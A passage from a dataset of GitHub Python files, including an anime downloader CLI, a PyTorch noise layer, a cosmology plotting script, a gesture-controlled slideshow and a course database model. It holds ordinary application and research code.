file(s)),\n include_dirs=[np.get_include()],\n setup_requires=[\"numpy\", \"scipy\", \"cython\"],\n install_requires=[\"numpy\", \"scipy\"],\n)\n","repo_name":"jasvob/DEODR","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"70"}
+{"seq_id":"6503569154","text":"import logging\nimport os\nfrom pathlib import Path\n\nimport click\nimport requests\nfrom tqdm import tqdm\n\nfrom ...codebase import (Associator, aed, get_filler_list, hls_download,\n sanitize_filename, url_download)\nfrom ...config import QUALITY, SESSION_FILE\nfrom ..helpers import *\n\n\n@click.command(name='download', help=\"Download your favorite anime by query.\")\n@click.argument('query', required=True)\n@click.option('-a', '--anonymous', is_flag=True, default=False,\n help='Avoid writing session files for this session.')\n@click.option('-s',\n '--start',\n help=\"An integer that determines where to begin the downloading from.\",\n required=False,\n default=0,\n show_default=False,\n type=int)\n@click.option('-e',\n '--end',\n help=\"A integer that determines where to end the downloading at.\",\n required=False,\n default=0,\n show_default=False,\n type=int)\n@click.option('-q',\n '--quality',\n help='Select a preferred quality if available.',\n required=False,\n default=QUALITY,\n type=int)\n@click.option('-t',\n '--title',\n help=\"Optional title for the anime if the query is a direct URL. This will be used as the download folder name.\",\n required=False,\n default='',\n show_default=False)\n@click.option('-fl',\n '--filler-list',\n help=\"Filler list associated with the content enqueued for the download.\",\n required=False,\n default='',\n show_default=False)\n@click.option('-o',\n '--offset',\n help=\"Offset (If the E1 of your anime is marked as E27 on AnimeFillerList, this value should be 26).\",\n required=False,\n default=0,\n show_default=False)\n@click.option('--filler', is_flag=True, default=True,\n help=\"Auto-skip fillers (If filler list is configured).\")\n@click.option('--mixed', is_flag=True, default=True,\n help=\"Auto-skip mixed fillers/canons (If filler list is configured).\")\n@click.option('--canon', is_flag=True, default=True,\n help=\"Auto-skip canons (If filler list is configured).\")\n@click.option('--idm', is_flag=True, default=False,\n help=\"Download anime using Internet Download Manager\")\n@click.option('--auto', is_flag=True, default=False,\n help=\"Select the first given index without asking for prompts.\")\n@click.option('-i', '--index', required=False, default=0,\n show_default=False, type=int, help=\"Index for the auto flag.\")\n@click.option('-ll',\n '--log-level',\n help='Set the integer log level.',\n type=int,\n default=20)\n@bannerify\ndef animdl_download(\n query,\n anonymous,\n start,\n end,\n quality,\n title,\n filler_list,\n offset,\n filler,\n mixed,\n canon,\n idm,\n auto,\n index,\n log_level):\n \"\"\"\n Download call.\n \"\"\"\n print(query,\n anonymous,\n start,\n end,\n quality,\n title,\n filler_list,\n offset,\n filler,\n mixed,\n canon,\n idm,\n auto,\n index,\n log_level)\n end = end or float('inf')\n\n session = requests.Session()\n\n anime, provider = process_query(\n session, query, auto=auto, auto_index=index)\n if not anime:\n return\n logger = logging.getLogger('animdl-%s-downloader-core' % provider)\n content_name = title or anime.get('name')\n if not content_name:\n content_name = choice(create_random_titles())\n logger.warn(\n \"Could not get the folder to download to, generating a cool random folder name: %s\" %\n content_name)\n logger.info(\n \"Initializing download session [%02d -> %s]\" %\n (start, '%02d' %\n end if isinstance(\n end, int) else '?'))\n url = anime.get('anime_url')\n anime_associator = Associator(url, session=session)\n check = lambda *args, **kwargs: True\n raw_episodes = []\n\n if filler_list:\n raw_episodes = get_filler_list(session, filler_list, fillers=True)\n logger.info(\n \"Succesfully loaded the filler list from '%s'.\" %\n filler_list)\n start += offset\n if not isinstance(end, int):\n end = len(raw_episodes)\n check = (lambda x: raw_episodes[offset +\n x -\n 1].content_type in ((['Filler'] if filler else []) +\n (['Mixed Canon/Filler'] if mixed else []) +\n (['Anime Canon', 'Manga Canon'] if canon else [])))\n\n if not anonymous:\n sessions.save_session(\n SESSION_FILE,\n url,\n start,\n content_name,\n filler_list,\n offset,\n filler,\n mixed,\n canon,\n t='download',\n end=end)\n\n base = Path('./%s/' % sanitize_filename(content_name.strip()))\n base.mkdir(exist_ok=True)\n\n streams = [\n *\n anime_associator.raw_fetch_using_check(\n lambda x: check(x) and end >= x >= start)]\n end_str = '%02d' % end if isinstance(end, int) else (\n start + len(streams) - 1) if not raw_episodes else len(raw_episodes)\n logger.info(\"Starting download session [%02d -> %s]\" % (start, end_str))\n logger.info(\"Downloads will be done in the folder '%s'\" % content_name)\n\n for stream_url_caller, c in streams:\n stream_urls = stream_url_caller()\n\n if not anonymous:\n sessions.save_session(\n SESSION_FILE,\n url,\n c,\n content_name,\n filler_list,\n offset,\n filler,\n mixed,\n canon,\n t='download',\n end=end,\n idm=idm)\n\n content_title = \"E%02d\" % c\n if raw_episodes:\n content_title += \" - %s\" % raw_episodes[c - 1].title.strip()\n\n if not stream_urls:\n logger.error(\n \"Failed to download '%s' due to lack of stream urls.\" %\n content_title)\n continue\n\n available_qualities = [*filter_quality(stream_urls, quality)]\n if not available_qualities:\n content = stream_urls[0]\n q = content.get('quality')\n if q not in ['multi']:\n logger.warn(\"Can't find the quality '{}' for {!r}; falling back to {}.\".format(\n quality, content_title, q if q != 'unknown' else 'an unknown quality'))\n else:\n content = available_qualities.pop(0)\n\n q = content.get('quality')\n\n if q not in ['unknown', 'multi'] and int(q or 0) != quality:\n logger.warn(\n \"Fell back to quality '{}' due to unavailability of '{}'.\".format(\n q, quality))\n\n extension = aed(content.get('stream_url'))\n if extension in ['php', 'html']:\n extension = 'mp4'\n file_path = Path(\n '%s.%s' %\n (sanitize_filename(content_title),\n extension or 'mp4'))\n download_path = base / file_path\n\n if extension in ['m3u', 'm3u8']:\n hls_download(stream_urls,\n base / (\"%s.ts\" % sanitize_filename(content_title)),\n content_title,\n preferred_quality=quality)\n continue\n\n if idm:\n from ...codebase.downloader import idmanlib\n if idmanlib.supported():\n if download_path.exists():\n download_path.chmod(0x1ff)\n os.remove(download_path.as_posix())\n logger.info(\n \"Downloading with Internet Download Manager [%02d/%s]\" %\n (c, end_str))\n idmanlib.wait_until_download(content.get('stream_url'), headers=content.get(\n 'headers', {}), filename=file_path, download_folder=base.absolute())\n continue\n\n url_download(\n content.get('stream_url'),\n download_path,\n lambda r: tqdm(\n desc=content_title,\n total=r,\n unit='B',\n unit_scale=True,\n unit_divisor=1024),\n content.get(\n 'headers',\n {}))\n","repo_name":"ajitjs1995/Anime_Down","sub_path":"core/cli/commands/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":8791,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"42605800982","text":"import torch\nfrom torch import nn\n\n\nclass MoGLayer(nn.Module):\n\n def __init__(self, noise_dim: tuple):\n \"\"\"\n\n :param noise_dim: The noise dimension\n \"\"\"\n super(MoGLayer, self).__init__()\n\n pre_std = torch.zeros(noise_dim)\n pre_std = torch.nn.init.uniform_(pre_std, -0.2, 0.2)\n self.std = nn.Parameter(pre_std, requires_grad=True)\n\n pre_mean = torch.zeros(noise_dim)\n pre_mean = torch.nn.init.uniform_(pre_mean, -1.0, 1.0)\n self.mean = nn.Parameter(pre_mean, requires_grad=True)\n\n def to(self, *args):\n \"\"\"\n Just override a bit to move the parameters\n :param args: Expected to be a device name\n :return: Nothing\n \"\"\"\n super(MoGLayer, self).to(args[0])\n self.mean = self.mean.to(args[0])\n self.std = self.std.to(args[0])\n\n def forward(self, noise):\n return self.mean + (self.std * noise)\n","repo_name":"nopphonyel/WWGAN","sub_path":"model/semi_supervised/layer.py","file_name":"layer.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"7056003692","text":"from chessboard import chessboard\nfrom choose import choose\nclass game(object):\n\tglobal row,col,chessboard,choose\n\tdef b(self):\n\t\tprint(\"Rows and Columns\")\n\t\tself.row=input()\n\t\tself.col=input()\n\t\tself.chessboard=chessboard(self.row,self.col)\n\tdef input(self):\n\t\tboard=self.chessboard\n\t\trow=self.row\n\t\tcol=self.col\n\t\tself.choose=choose()\n\t\tprint(\"Player A Input\")\n\t\tfor x in range(col):\n\t\t\tp=input()\n\t\t\tself.choose.input(row-1,x,p,board,\"A\")\n\t\tprint(\"Player B Input\")\n\t\tfor x in range(col):\n\t\t\tp=input()\n\t\t\tself.choose.input(0,x,p,board,\"B\")\n\tdef start(self):\n\t\twhile(True):\n\t\t\tprint(\"Player A,Your Move\")\n\t\t\tp=input()\n\t\t\tself.choose.move(\"A\",self.chessboard,p)\n\t\t\tprint(\"Player B,Your Move\")\n\t\t\tp=input()\n\t\t\tself.choose.move(\"B\",self.chessboard,p)","repo_name":"hemant1996/chesss","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"24702158816","text":"#!/usr/bin/env python3\n\"\"\"A script for reading and plotting snapshots from cosmo_sim_1d\"\"\"\n\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom functions import smoothing, spectral_calc, SPT_real_tr, read_density\nfrom scipy.interpolate import interp1d\nfrom zel import initial_density\nos.environ[\"HDF5_USE_FILE_LOCKING\"] = \"FALSE\"\n\n# path = 'cosmo_sim_1d/phase_full_run1/'\n# path = 'cosmo_sim_1d/sim_k_1 (copy)/run1/'\npath = 'cosmo_sim_1d/sim_k_1_11/run6/'\n# path = 'cosmo_sim_1d/amps_sim_k_1_11/run1/'\n\n\nmoments_filename = 'output_hierarchy_{0:04d}.txt'.format(0)\nmoments_file = np.genfromtxt(path + moments_filename)\na0 = moments_file[:,-1][0]\nLambda = 3 * (2*np.pi)\nkind = 'sharp'\nsm = True\nfor j in range(1):\n j = 23\n nbody_filename = 'output_{0:04d}.txt'.format(j)\n nbody_file = np.genfromtxt(path + nbody_filename)\n x_nbody = nbody_file[:,-1]\n v_nbody = nbody_file[:,2]\n print(x_nbody.size)\n moments_filename = 'output_hierarchy_{0:04d}.txt'.format(j)\n moments_file = np.genfromtxt(path + moments_filename)\n a = moments_file[:,-1][0]\n print(a)\n x = moments_file[:,0]\n L = 1.0#np.max(x)\n k = np.fft.ifftshift(2.0 * np.pi * np.arange(-x.size/2, x.size/2))\n if sm == True:\n M0 = smoothing(moments_file[:,2], k, Lambda, kind) #with the -1, this is \\delta\n C0 = smoothing(moments_file[:,3], k, Lambda, kind) #with the -1, this is \\delta\n M1 = smoothing(moments_file[:,4], k, Lambda, kind) #with the -1, this is \\delta\n C1 = smoothing(moments_file[:,5], k, Lambda, kind) #with the -1, this is \\delta\n M2 = smoothing(moments_file[:,6], k, Lambda, kind) #with the -1, this is \\delta\n C2 = smoothing(moments_file[:,7], k, Lambda, kind) #with the -1, this is \\delta\n M3 = smoothing(moments_file[:,8], k, Lambda, kind) #with the -1, this is \\delta\n C3 = smoothing(moments_file[:,9], k, Lambda, kind) #with the -1, this is \\delta\n M4 = smoothing(moments_file[:,10], k, Lambda, kind) #with the -1, this is \\delta\n C4 = smoothing(moments_file[:,11], k, Lambda, kind) #with the -1, this is \\delta\n M5 = smoothing(moments_file[:,12], k, Lambda, kind) #with the -1, this is \\delta\n C5 = smoothing(moments_file[:,13], k, Lambda, kind) #with the -1, this is \\delta\n else:\n M0 = moments_file[:,2]\n C0 = moments_file[:,3]\n M1 = moments_file[:,4]\n C1 = moments_file[:,5]\n M2 = moments_file[:,6]\n C2 = moments_file[:,7]\n M3 = moments_file[:,8]\n C3 = moments_file[:,9]\n M4 = moments_file[:,10]\n C4 = moments_file[:,11]\n M5 = moments_file[:,12]\n C5 = moments_file[:,13]\n\n # fields = [M0]#, C0, M1, C1, M2, C2, M3, C3, M4, C4, M5, C5]\n # for j in range(len(fields)):\n # fields[j] = smoothing(, k, Lambda, kind)\n # # print(field)\n\n # from scipy.interpolate import interp1d\n # initial_file = np.genfromtxt(path + 'output_initial.txt')\n # q = initial_file[:,0]\n # Psi = initial_file[:,1]\n #\n # nbody_file = np.genfromtxt(path + 'output_{0:04d}.txt'.format(j))\n # x_in = nbody_file[:,-1]\n #\n # Nx = x_in.size\n # L = np.max(x_in)\n # k = np.fft.ifftshift(2.0 * np.pi / L * np.arange(-Nx/2, Nx/2))\n # dc_in_Psi = -spectral_calc(Psi, L, o=1, d=0) / a0\n # dc_SPT_Psi = SPT_real_tr(smoothing(dc_in_Psi, k, Lambda, kind='gaussian'), k, L, Lambda=1, a=a, kind='gaussian')\n # x_in = np.sort(x_in)\n #\n # k_nb= np.fft.ifftshift(2.0 * np.pi * np.arange(-x.size/2, x.size/2))\n # M0 = smoothing(M0, k_nb, Lambda, kind='gaussian')\n\n # A = [-0.05, 1, -0.5, 11]\n # dc_in = initial_density(x, A, L)\n # Nx = x.size\n # k = np.fft.ifftshift(2.0 * np.pi / L * np.arange(-Nx/2, Nx/2))\n # dc_SPT = SPT_real_tr(dc_in, k, L, Lambda=1, a=a, kind='gaussian')\n\n # f_dc = interp1d(q, dc_SPT_Psi, kind='cubic', fill_value='extrapolate')\n # dc_SPT_Psi = f_dc(x)\n\n # dk_par, a, dx = read_density(path, j)\n # L = 1.0\n # x_grid = np.arange(0, L, dx)\n #\n # M0_par = np.real(np.fft.ifft(dk_par))\n # M0_par /= np.mean(M0_par)\n # f_M0 = interp1d(x_grid, M0_par, fill_value='extrapolate')\n # M0_par = f_M0(x)\n # M0_k = np.fft.fft(M0_par - 1) / M0_par.size\n # P_nb = np.real(M0_k * np.conj(M0_k))\n # k = np.fft.ifftshift(2.0 * np.pi / L * np.arange(-P_nb.size/2, P_nb.size/2)) / (2*np.pi)\n # C1 = v_nbody\n moments = ['M0', 'C0', 'M1', 'M2', 'C1', 'C2', 'M3', 'C3', 'M4', 'C4', 'M5', 'C5']#, 'M1', 'C1', 'M2', 'C1', 'C2']\n # moments = ['C2']\n g = 500\n i1, i2 = 0, -1 #250000-g, 250000+g\n\n for MorC, nM in moments:\n ylabel = r\"$\\mathrm{{{MorC}}}^{{({nM})}}$\".format(MorC=MorC, nM=nM)\n\n nbody_m = '{}{}'.format(MorC, nM)\n\n fig, ax = plt.subplots()\n ax.set_title(r'$a = {}$'.format(a))\n ax.set_xlabel(r'$x\\;[h^{-1}\\;\\mathrm{Mpc}]$', fontsize=14)\n # ax.set_xlabel(r'$k\\;[2\\pi h\\;\\mathrm{Mpc}^{-1}]$', fontsize=14)\n # ax.set_ylabel(r'$P(k)$', fontsize=14)\n\n ax.set_ylabel(ylabel, fontsize=14)\n\n # ax.scatter(k, P_nb, c='k', s=20, label=r'$N-$body')\n # ax.plot(x, dc_in, c='b', lw=2, label=r'analytical')\n # ax.plot(x, dc_in_Psi, c='r', ls='dashdot', lw=2, label=r'numerical')\n\n ax.plot(x[i1:i2], locals()[nbody_m][i1:i2], c='k', lw=2)#, label='hierarchy')\n\n\n # ax.plot(x_nbody[i1:i2], v_nbody[i1:i2], c='k', lw=2, label='hierarchy')\n\n # ax.plot(x_in, dc_SPT_Psi, c='r', ls='dashdot', lw=2, label='SPT')\n # ax.plot(x, dc_SPT, c='b', ls='dashed', lw=2, label='SPT an')\n # ax.set_xlim(0, 10)\n # plt.legend()\n ax.tick_params(axis='both', which='both', direction='in')\n ax.ticklabel_format(scilimits=(-2, 3))\n ax.grid(lw=0.2, ls='dashed', color='grey')\n ax.yaxis.set_ticks_position('both')\n ax.minorticks_on()\n\n # plt.savefig('../plots/nbody_gauss_run/{}{}/{}{}_{}.png'.format(MorC, nM, MorC, nM, j), bbox_inches='tight', dpi=120)\n # plt.savefig('../plots/nbody_gauss_run/PS_{}.png'.format(j), bbox_inches='tight', dpi=120)\n\n # plt.savefig('../plots/new_sim_k_1_11/sm/{}/{}_{}.png'.format(nbody_m, nbody_m, j), bbox_inches='tight', dpi=150)\n # plt.close()\n plt.show()\n","repo_name":"mandarmk9/eft_code","sub_path":"cosmo_sim_an.py","file_name":"cosmo_sim_an.py","file_ext":"py","file_size_in_byte":6250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"42626121170","text":"#!/usr/bin/env python\n\n'''\nThis programme searches a dump file to find any chunks without a first chunk. It then saves the names of these chunks to a seperate file to be deleted later. It sorts the file containing all the files in as it is quicker than running over the file multiple times\n'''\n\nimport gzip, sys\n\ninput = sys.argv[1]\noutput = sys.argv[2]\n\nfin = gzip.open(input, \"r\")\norphans = open(output, \"w\")\nsortedfile = sorted(fin)\nfirstfile = sortedfile[0]\npreviousFile = firstfile[0:-18]\nffend = firstfile[-16:]\nstrippedffend = ffend.strip()\nif strippedffend != \"0000000000000000\":\n lastOrphan = firstfile[0:-18]\nelse:\n lastOrphan = \"a\"\n\nfor line in sortedfile:\n strippedline = line.strip()\n end = strippedline[-16:]\n currentFile = line[0:-18]\n if currentFile == previousFile or end == \"0000000000000000\":\n if currentFile != lastOrphan:\n previousFile = currentFile\n continue\n orphans.write(line)\n previousFile = currentFile\n lastOrphan = currentFile\n","repo_name":"stfc/ral-ceph-tools","sub_path":"dataconsistency/orphanfiles.py","file_name":"orphanfiles.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"70"}
+{"seq_id":"27462852174","text":"BUTTONS = {\n 'A': 4, # L1\n 'B': 5, # R1\n 'C': 0, # A\n 'D': 1, # B\n 'E': 2, # X\n 'F': 3, # Y\n 'G': 6, # Left middle\n 'H': 7, # right middle\n 'I': 8, # Xbox\n 'J': 9, # L3\n 'K': 10, # R3\n}\n\nAXES = {\n 'LX': 0, # Horizontal Left\n 'LY': 1, # Vertical Left\n 'RX': 3, # Horizontal Right\n 'RY': 4, # Vertical Right\n 'LT': 2, # Trigger Left\n 'RT': 5, # Trigger Right\n}\n","repo_name":"gpatsiaouras/doratello","sub_path":"src/controllers/xbox_one.py","file_name":"xbox_one.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"3504057671","text":"import pandas as pd\nimport ast\nimport numpy as np\n\n\ndef extract_data(csv_file):\n data = pd.read_csv(csv_file)\n cols_needed = [\"trip_number\", \"so_number\", \"vehicle_plate_no\"]\n dropoffs = data[\"dropoffs\"]\n pickups = data[\"pickups\"]\n\n data = data[data.columns.intersection(cols_needed)]\n\n dropoff_name = []\n dropoff_arrival = []\n pickup_name = []\n pickup_arrival = []\n\n for dropoff in dropoffs:\n dropoff_dict = ast.literal_eval(dropoff)\n for value in dropoff_dict:\n dropoff_name.append(value.get(\"name\", \"No name\"))\n dropoff_arrival.append(value.get(\"arrival\", \"No arrival\"))\n\n for pickup in pickups:\n pickup_dict = ast.literal_eval(pickup)\n for value in pickup_dict:\n pickup_name.append(value.get(\"name\", \"No name\"))\n pickup_arrival.append(value.get(\"arrival\", \"No arrival\"))\n\n data[\"dropoff_name\"] = np.array(dropoff_name)\n data[\"dropoff_arrival\"] = pd.to_datetime(np.array(dropoff_arrival))\n data[\"pickup_name\"] = np.array(pickup_name)\n data[\"pickup_arrival\"] = pd.to_datetime(np.array(pickup_arrival))\n\n data[\"dropoff_arrival\"] += pd.DateOffset(hours=8)\n data[\"pickup_arrival\"] += pd.DateOffset(hours=8)\n return data\n\n\ntrans = extract_data(\"Transpecial-FO-Jan2021.csv\")\ntrans.to_csv(\"Transpecial-FO-Jan2021-extracted.csv\")\n\nehd = extract_data(\"EHD_Logistics-FO-Jan2021.csv\")\nehd.to_csv(\"EHD_Logistics-FO-Jan2021-extracted.csv\")\n\npan = extract_data(\"Pan_Logistics-FO-Jan2021.csv\")\npan.to_csv(\"Pan_Logistics-FO-Jan2021-extracted.csv\")\n","repo_name":"idellang/Work-And-Projects","sub_path":"WTI/CICO Matching Algo/data_fo/extracting_fo.py","file_name":"extracting_fo.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"39491781590","text":"#In This project we can use pinkeyfinger change pages to right and thumb changes pages in left direction\r\nimport cv2\r\nfrom cvzone.HandTrackingModule import HandDetector\r\n\r\ndetector = HandDetector(maxHands=1, detectionCon=0.8)\r\nimport os\r\n\r\nheight, width = 1200, 700\r\ncap = cv2.VideoCapture(0)\r\ncap.set(3, width)\r\ncap.set(4, height)\r\nhs, ws = int(200), int(200)\r\nimgnumber = 0\r\nfolderpath = \"images\"\r\npathimages = sorted(os.listdir(folderpath), key=len)\r\nthresold = 300\r\nbuttonpressed = False\r\nbuttoncounter = 0\r\nbuttondelay = 30\r\n\r\nwhile True:\r\n ret, img = cap.read()\r\n img = cv2.flip(img, 1)\r\n pathfullimages = os.path.join(folderpath, pathimages[imgnumber])\r\n imagecurrunt = cv2.imread(pathfullimages)\r\n imgsmall = cv2.resize(img, (ws, hs))\r\n h, w, _ = imagecurrunt.shape\r\n imagecurrunt[0:hs, w - ws:w] = imgsmall\r\n hands, img = detector.findHands(img)\r\n cv2.line(img, (0, thresold), (width, thresold), (0, 255, 0), 3)\r\n\r\n if hands and buttonpressed is False:\r\n hand = hands[0]\r\n finger = detector.fingersUp(hand)\r\n\r\n cx, cy = hand['center']\r\n lmList = hand['lmList']\r\n indexFinger=lmList[8][0],lmList[8][1]\r\n\r\n if cy <= thresold:\r\n\r\n if finger == [1, 0, 0, 0, 0]:\r\n\r\n print(\"left\")\r\n if imgnumber > 0:\r\n buttonpressed = True\r\n imgnumber -= 1\r\n if finger == [0, 0, 0, 0, 1]:\r\n\r\n print(\"Right\")\r\n if imgnumber < len(pathimages) - 1:\r\n buttonpressed = True\r\n imgnumber += 1\r\n if finger == [0, 1, 1, 0, 1]:\r\n cv2.circle(imagecurrunt,indexFinger,20,(255,0,0),cv2.FILLED)\r\n\r\n if buttonpressed:\r\n buttoncounter += 1\r\n if buttoncounter > buttondelay:\r\n buttoncounter = 0\r\n buttonpressed = False\r\n\r\n cv2.imshow(\"img1\", imagecurrunt)\r\n cv2.imshow(\"img\", img)\r\n\r\n key = cv2.waitKey(1)\r\n if key == 27:\r\n break\r\ncap.release()\r\ncv2.destroyWindow()","repo_name":"khushbuchuahan3/Hand_Control_Presentation","sub_path":"Hand_control_presentation.py","file_name":"Hand_control_presentation.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"20995842000","text":"from sqlalchemy import Column, String, Integer, ForeignKey, Text, Boolean\nfrom marshmallow import fields\n\nimport models\nfrom models.generics.models import db, ma\nfrom models.generics.base import Base\nfrom common.dates import datetime_to_string, string_to_datetime\nfrom models.generics.resources import WithUrl, WithVersion, WithVisibility\n\n\nclass CourseSettingsSchema(ma.Schema):\n enforce_dates = fields.Boolean(default=False)\n\n\nclass Course(Base, WithUrl, WithVersion, WithVisibility):\n SERVICES = ['native', 'lti']\n VISIBILITIES = ['private', 'public', 'students', 'teacher']\n LOG_LEVELS = ['nothing', 'everything', 'errors']\n\n name = Column(String(255))\n description = Column(Text())\n owner_id = Column(Integer(), ForeignKey('user.id'))\n service = Column(String(80), default=\"native\")\n external_id = Column(String(255), default=\"\")\n endpoint = Column(Text(), default=\"\")\n visibility = Column(String(80), default=\"private\")\n is_default = Column(Boolean(), default=False)\n term = Column(String(255), default=\"\")\n settings = Column(Text(), default=\"\")\n\n owner = db.relationship(\"User\")\n\n def encode_json(self):\n user = models.User.query.get(self.owner_id)\n return {'_schema_version': 3,\n 'name': self.name,\n 'url': self.url,\n 'owner_id': self.owner_id,\n 'owner_id__email': user.email if user else '',\n 'service': self.service,\n 'external_id': self.external_id,\n 'endpoint': self.endpoint,\n 'visibility': self.visibility,\n 'settings': self.settings,\n 'term': self.term,\n 'id': self.id,\n 'date_modified': datetime_to_string(self.date_modified),\n 'date_created': datetime_to_string(self.date_created)}\n\n SCHEMA_V1_IGNORE_COLUMNS = Base.SCHEMA_V1_IGNORE_COLUMNS + ('owner_id__email',)\n SCHEMA_V2_IGNORE_COLUMNS = Base.SCHEMA_V2_IGNORE_COLUMNS + ('owner_id__email',)\n SCHEMA_V3_IGNORE_COLUMNS = SCHEMA_V2_IGNORE_COLUMNS\n\n\n @staticmethod\n def export(course_id):\n course = Course.query.get(course_id)\n # Get all course's assignments\n course_assignments = models.Assignment.by_course(course_id, False)\n # Get all course's assignment groups\n groups = course.get_assignment_groups()\n assignment_groups = [a.encode_json() for a in groups]\n\n # Get all assignment groups' memberships\n assignment_memberships = [a.encode_json()\n for a in models.AssignmentGroupMembership.by_course(course_id)]\n # Get all assignment groups' assignments\n groups_assignments = {a for g in groups\n for a in g.get_assignments()}\n groups_assignments.update(course_assignments)\n assignments = [a.encode_json() for a in groups_assignments]\n assignments.sort(key=lambda a: a['name'])\n return {\n 'course': course.encode_json(),\n 'assignments': assignments,\n 'assignment_groups': assignment_groups,\n 'assignment_memberships': assignment_memberships\n }\n\n def __str__(self):\n return ''.format(self.id)\n\n @staticmethod\n def get_public():\n return Course.query.filter_by(visibility='public').all()\n\n @staticmethod\n def remove(course_id, remove_linked=False):\n Course.query.filter_by(id=course_id).delete()\n if remove_linked:\n for m in models.AssignmentGroupMembership.by_course(course_id):\n db.session.delete(m)\n for a in models.Assignment.by_course(course_id):\n for s in a.sample_submissions():\n db.session.delete(s)\n db.session.delete(a)\n for g in models.AssignmentGroup.by_course(course_id):\n db.session.delete(g)\n for r in models.Role.by_course(course_id):\n db.session.delete(r)\n db.session.commit()\n\n def get_users(self):\n return (db.session.query(models.Role, models.User)\n .filter(models.Role.course_id == self.id)\n .filter(models.Role.user_id == models.User.id).all())\n\n def get_students(self):\n return [x[1] for x in (db.session.query(models.Role, models.User)\n .filter(models.Role.course_id == self.id)\n .filter(models.Role.user_id == models.User.id).distinct())]\n\n def get_assignments(self):\n return (db.session.query(models.Assignment, models.AssignmentGroupMembership)\n .filter(models.Assignment.course_id == self.id,\n models.AssignmentGroupMembership.assignment_id == models.Assignment.id)\n .all())\n\n def get_submitted_assignments(self):\n return (db.session.query(models.Assignment)\n .join(models.Submission, models.Submission.assignment_id == models.Assignment.id)\n .filter(models.Submission.course_id == self.id)\n .distinct())\n\n def get_submissions(self):\n return (db.session.query(models.Submission)\n .filter(models.Submission.course_id == self.id)\n .all())\n\n def get_assignment_groups(self):\n return (db.session.query(models.AssignmentGroup)\n .filter(models.AssignmentGroup.course_id == self.id)\n .order_by(models.AssignmentGroup.name)\n .all())\n\n def update_endpoint(self, endpoint):\n self.endpoint = endpoint\n db.session.commit()\n\n @staticmethod\n def get_all_groups(menu='embed'):\n courses = Course.query.all()\n return [{'id': course.id,\n 'name': course.name,\n 'groups': [{'id': group.id,\n 'name': group.name,\n 'select_url': group.get_select_url(menu)}\n for group in models.AssignmentGroup.by_course(course.id)]\n }\n for course in courses]\n\n @staticmethod\n def rename(course_id, name=None):\n course = Course.by_id(course_id)\n if name is not None:\n course.name = name\n db.session.commit()\n return course\n\n @staticmethod\n def new(name, owner_id, visibility):\n if visibility == 'public':\n visibility = 'public'\n else:\n visibility = 'private'\n new_course = Course(name=name, owner_id=owner_id, visibility=visibility)\n db.session.add(new_course)\n db.session.flush()\n new_role = models.Role(name='instructor', user_id=owner_id, course_id=new_course.id)\n db.session.add(new_role)\n db.session.commit()\n return new_course\n\n @staticmethod\n def new_lti_course(service, external_id, name, user_id, endpoint=\"\"):\n new_course = Course(name=name, owner_id=user_id,\n service=service, external_id=external_id,\n endpoint=endpoint)\n db.session.add(new_course)\n db.session.commit()\n return new_course\n\n @staticmethod\n def by_url(course_url):\n return Course.query.filter_by(url=course_url).first()\n\n @staticmethod\n def from_lti(service, lti_context_id, name, user_id, endpoint=\"\"):\n lti_course = Course.query.filter_by(external_id=lti_context_id).first()\n if lti_course is None:\n return Course.new_lti_course(service=service,\n external_id=lti_context_id,\n name=name,\n user_id=user_id,\n endpoint=endpoint)\n else:\n return lti_course\n\n def grading_grid(self):\n # Return a list of lists of assignments/students/submissions\n assignments = []\n submissions = []\n return assignments, submissions\n\n\nclass CourseSchema(ma.SQLAlchemyAutoSchema):\n class Meta:\n model = Course\n include_fk = True\n\n\n","repo_name":"blockpy-edu/blockpy-server-v2","sub_path":"models/course.py","file_name":"course.py","file_ext":"py","file_size_in_byte":8117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"43190456182","text":"from dataclasses import dataclass, field\nfrom typing import List, Optional\nfrom datexii.models.eu.datexii.v2.accessibility_enum import AccessibilityEnum\nfrom datexii.models.eu.datexii.v2.dedicated_access import DedicatedAccess\nfrom datexii.models.eu.datexii.v2.extension_type import ExtensionType\nfrom datexii.models.eu.datexii.v2.multilingual_string import MultilingualString\nfrom datexii.models.eu.datexii.v2.occupancy_detection_type_enum import OccupancyDetectionTypeEnum\nfrom datexii.models.eu.datexii.v2.parking_assignment import ParkingAssignment\nfrom datexii.models.eu.datexii.v2.parking_mode_enum import ParkingModeEnum\nfrom datexii.models.eu.datexii.v2.parking_security_enum import ParkingSecurityEnum\nfrom datexii.models.eu.datexii.v2.parking_space_accessibility_enum import ParkingSpaceAccessibilityEnum\nfrom datexii.models.eu.datexii.v2.parking_space_basics_equipment_or_service_facility_index_parking_equipment_or_service_facility import ParkingSpaceBasicsEquipmentOrServiceFacilityIndexParkingEquipmentOrServiceFacility\nfrom datexii.models.eu.datexii.v2.parking_space_basics_scenario_index_parking_usage_scenario import ParkingSpaceBasicsScenarioIndexParkingUsageScenario\nfrom datexii.models.eu.datexii.v2.parking_space_physics_enum import ParkingSpacePhysicsEnum\nfrom datexii.models.eu.datexii.v2.reservation_type_enum import ReservationTypeEnum\n\n__NAMESPACE__ = \"http://datex2.eu/schema/2/2_0\"\n\n\n@dataclass\nclass ParkingSpaceBasics:\n \"\"\"\n Common properties 